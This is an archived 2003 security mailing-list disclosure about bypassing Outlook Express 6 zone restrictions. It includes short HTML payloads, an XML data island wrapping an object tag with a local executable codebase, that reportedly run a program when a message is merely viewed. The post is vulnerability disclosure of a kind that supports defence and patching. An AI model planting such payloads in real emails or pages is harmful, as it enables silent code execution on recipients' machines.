lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <200302221441.h1MEf9I18008@web174.megawebservers.com>
From: http-equiv at malware.com (http-equiv@...ite.com)
Subject: O UTLO OK  EXP RE SS 6 .00 : broken


Saturday, February 22, 2003

Technical silent delivery and installation of an executable no client 
input other than reading an email or viewing a newsgroup message. 
Outlook Express 6.00 SP1 Cumulative Pack 1 2 3 4 whatever.

This should not be possible.

When viewing an email message or a newsgroup message, Outlook Express 
creates a temp file in the Internet Explorer cache.  From here 
security should be governed by Internet Explorer's security settings.

In an html email with internet zone applied, this will not function:

<object classid="clsid:11111111-1111-1111-1111" 
codebase="C:\WINDOWS\FTP.EXE"></object>

[screen shot: http://www.malware.com/tsktsk.png 11KB]

In an html email message or newsgroup message with internet zone 
applied this will function:

<xml id=oExec> <security><exploit> <![CDATA[ <object id="oFile" 
classid="clsid:11111111-1111-1111-1111" 
codebase="C:\WINDOWS\FTP.EXE"></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html 
dataSrc=#oExec></SPAN>

courtesy of: http://sec.greymagic.com/adv/gm001-ie/

[screen shot: http://www.malware.com/tsktsktsk.png 11KB]

NOTE: that default installations of Outlook Express 6.00 are with 
restricted zone applied.  However there still remain many 'happy 
people' out there that enjoy their html mail messages and html 
newsgroup messages, and coupling the above with any one of a million 
other unsolved problems now and in the future with Internet Explorer 
and Outlook Express, including a new 
http://www.malware.com/stench.html we are back in business.

Notes: This is supposed to be patched: 
http://microsoft.com/technet/security/bulletin/MS02-015.asp 28 March 
2002

Keywords: experts Academic Advisory Board Think Tank security concepts

-- 
http://www.malware.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ